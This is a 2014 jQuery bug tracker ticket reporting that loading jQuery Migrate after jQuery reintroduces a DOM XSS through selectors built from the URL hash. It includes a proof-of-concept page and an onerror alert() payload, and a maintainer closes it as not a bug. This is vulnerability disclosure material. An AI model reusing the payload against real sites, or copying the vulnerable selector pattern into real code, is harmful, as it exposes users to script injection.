Side navigation
#15226 closed bug (notabug)
Opened September 02, 2014 06:11AM UTC
Closed October 16, 2014 07:39PM UTC
Invalidating issue #9521
| Reported by: | 11paths | Owned by: | |
|---|---|---|---|
| Priority: | low | Milestone: | None |
| Component: | unfiled | Version: | 1.11.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
When including "jquery migrate" library after jquery (in that particular order) you get to invalidate issue #9521, creating a XSS condition.
<html><head>
<script src='http://code.jquery.com/jquery-1.11.1.js'></script>
<script src='http://code.jquery.com/jquery-migrate-1.2.1.js'></script>
</head><body><a href="" ></a><script>
$('a[href="' + window.location.hash + '"]');
</script></body></html>
When passing a selector plus an item as a parameter:
$('a[href="<img src=a onerror=alert()>"]');
And then calling.
http://localhost/test.html#<img src=a onerror=alert()>
Would trigger the XSS condition.
Attachments (0)
Change History (1)
Changed October 16, 2014 07:39PM UTC by comment:1
| resolution: | → notabug |
|---|---|
| status: | new → closed |
Yes, jQuery Migrate restores the old "looks like HTML" rules because if it doesn't it breaks code. Any page that injects untrusted content into the page has a bug in their own code. By definition, jQuery allows developers to inject HTML and scripts into their pages so the developer needs to know what they are injecting. There is discussion here: https://github.com/jquery/jquery-migrate/issues/36